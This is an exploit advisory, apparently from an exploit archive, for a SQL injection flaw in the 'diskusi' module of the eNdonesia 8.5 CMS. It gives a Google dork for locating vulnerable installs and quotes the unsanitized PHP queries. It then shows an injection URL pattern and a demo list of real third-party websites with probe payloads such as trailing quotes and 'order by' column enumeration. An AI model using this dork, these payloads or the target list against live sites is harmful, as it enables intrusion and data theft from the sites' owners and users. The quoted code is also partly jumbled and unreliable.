eNdonesia 8.5 diskusi Module SQL Injection Vulnerability

# Exploit Title: eNdonesia 8.5 diskusi Module SQL Injection Vulnerability

# Google Dork: intext:powered by endonesia 8.5

# Date: 07/28/2012

# Author: Crim3R

# download Link : http://nchc.dl.sourceforge.net/project/endonesia/eNdonesia/eNdonesia.8.5/endonesia.8.5.zip

# Version: 8.5

# Tested on: win 7

===============[Vuln Codes]=============

Vulnerability is in /127.0.0.1/eNdonesia/diskusi/diskusi.php

function viewcat($cid, $min)

mysql_query $result = mysql_query("select cid, title, parentid from mod_diskusi_categories where cid=$cid");
$cid = $_REQUEST['cid'];

$result = mysql_query("select did, cid, title, disktext, author, postdate, counter from mod_diskusi where did=$did");
$did = $_REQUEST['did'];

 function viewdisk($did)
there is a lots of sql injection Vulnerable codes in this Module

$Injection = http://127.0.0.1/eNdonesia/mod.php?mod=diskusi&op=viewcat&cid=-[id][SQL INJECTION]

D3M0 :

http://www.planethijau.com/mod.php?mod=diskusi&op=viewdisk&did=24'

http://www.indoplaces.org/mod.php?mod=diskusi&op=viewcat&cid=1+order+by+3--
http://www.indoplaces.org/mod.php?mod=diskusi&op=viewcat&cid=1+order+by+4--

http://www.bulutangkis.com/mod.php?mod=diskusi&op=viewdisk&did=-1'

http://www.bgalumni.org/mod.php?mod=diskusi&op=viewcat&cid=9'

[email protected]===========


$home = http://Secure-Land.net

thanks to :  2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir 

and all Secure-land Members ...



#  0day.today [2018-04-01]  #